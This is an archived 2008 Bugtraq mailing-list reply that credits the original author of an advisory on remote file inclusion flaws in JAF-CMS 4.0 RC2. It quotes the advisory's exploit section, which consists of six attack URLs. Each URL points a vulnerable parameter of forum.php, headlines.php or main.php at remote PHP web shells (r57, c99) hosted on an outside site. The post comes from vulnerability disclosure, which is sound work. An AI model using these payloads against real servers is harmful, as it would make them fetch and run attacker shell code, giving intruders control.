lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Thu, 27 Mar 2008 11:42:51 -0500
From: str0ke <str0ke@...w0rm.com>
To: r57blg@...il.com
Cc: bugtraq@...urityfocus.com
Subject: Re: JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities

Original author:

CraCkEr


Original advisory
http://milw0rm.com/exploits/5317

/str0ke

r57blg@...il.com wrote:
>  JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities 
>
>
> [+] Author : XxX
>
> [+] Site : www.wikipediatr.com
>
> ==============================================
>
> Exploit :         http://localhost/path/module/forum/forum.php?website=http://www.r57shell.in/r57.txt?       
>         http://localhost/path/module/forum/forum.php?main_dir=http://www.r57shell.in/c99.txt?        http://localhost/path/module/forum/headlines.php?website=http://www.r57shell.in/erne.txt?
>         http://localhost/path/module/forum/headlines.php?main_dir=http://www.r57shell.in/r57.txt?
>         http://localhost/path/module/forum/main.php?website=http://www.r57shell.in/c99.txt?
>         http://localhost/path/module/forum/main.php?main_dir=http://www.r57shell.in/erne.txt?
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ